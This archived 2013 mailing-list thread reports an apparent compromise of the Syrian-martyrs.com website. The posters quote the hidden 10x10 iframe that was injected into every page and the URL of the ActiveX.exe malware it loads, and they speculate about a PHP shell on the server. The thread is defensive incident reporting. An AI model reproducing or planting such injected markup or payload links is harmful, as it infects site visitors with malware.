[liberationtech] Syrian-martyrs.com website probably compromised by virus

SiNA Rabbani sina at redteam.io
Tue Jan 29 14:34:17 PST 2013 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

This is the malware:
> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/


- --SiNA



SiNA
> 
Rabbani:
> holly shit:
> 
> <iframe name="I1" width="10" height="10" 
> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
>
> 
border="0"
> frameborder="0">
> 
> 
> :/ if you are running windows don't even go there!!!
> 
> 
> Andrew Lewis:
>> I can get to this in 6 hours or so, maybe someone is willing to 
>> jump on this before then?
> 
>> -Andrew
> 
>> On Jan 30, 2013, at 11:06 AM, KheOps <kheops at ceops.eu> wrote:
> 
>>> Dear Libtech,
>>> 
>>> We just saw that the website : http://www.syrian-martyrs.com
>>> is probably compromised. Every page of the website contains an 
>>> iFrame which links to a .exe file which is detected as a virus
>>> by antivirus software: 
>>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
>>>
>>>
>>>
>
>>> 
The fact that the HTML code is present at the bottom of each page makes
>>> me think that the "index.php" page has been changed in a way
>>> that makes that iFrame appear on every page of the website,
>>> after the dynamic content.
>>> 
>>> It also probably means that the attackers have some kind of 
>>> access to the server. My guess would be going to a PHP shell,
>>> but I'm no expert in this.
>>> 
>>> Any help, clue, investigation, would be very welcome :)
>>> 
>>> Thank you, KheOps
>>> 
>>> -- Unsubscribe, change to digest, or change password at: 
>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
>> -- Unsubscribe, change to digest, or change password at: 
>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
> 
> 
> 
> 

- -- 
“Be the change you want to see in the world.” Gandhi

OTR: inf0 at jabber.ccc.de
a5dae15f45a37e9768f6deae7b54807fc4942ec9
-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJRCE5pAAoJEDxieAEiLOmoxJMP/iQNfzxEQcQ81Yp8JtGJmos0
sO+G2HSosH5OD2+PWSXjLuIT7rwijZSgh4XeFz2vIbSicvv1xJZoPzmiUVhKC4GB
9nzUNar86XgtXx2yXCpCjSgQcVwWB2ZRZL6OeZM5DXPUjC/AINXCPQc4rGU1Mcak
B22oBaqiHrWjk5mPQZNcnoJVD2IyL9ZaQBt3WtjLVZo3s59j5vEW/MVqiIrqJiSR
E7m5ehPnfyh4KUKwEe2+/PF9K3e4o8v0DquJhbjxsu0ibfDJg/6cqKaiPYZvOv77
dSQ9YcOOFjHzOYUa/yeTZ2ea92LJPe58IsiIJQxmDWsOFV/upLn1hhVdONN+fTHO
tKzcuCDjqwN1DCWPiyZe7y1EJzl6giplzXNk+XeoXwDau530u5iI65YwQBVtPEsA
kqwHQQxOFsL5kx/JEdO+rKQcX9jAZAkQ9vF6XfNeOGvzwsvLJHbIlFPwxXP/CPjM
kUMdkAjRghEM8kMB9D3BI2MI/uWJN9EVe46ZPQpfmVNBf5Uen9ROyKSp1/h9t9Wy
fbWBDVGJms4rU9rVRsyYhFl3eiHfVDy2/y1yFLEzfCXqEJw7OHAstNJ3O8d+iDKI
WLhlIFej4CyDjzyLy1P9k4YTnv3ZR16hHftIXXT+zj8sKPYXbawiAGWtwbBGws8j
8ijLbNKdHoHtJlcOGMwg
=+vsJ
-----END PGP SIGNATURE-----

More information about the liberationtech mailing list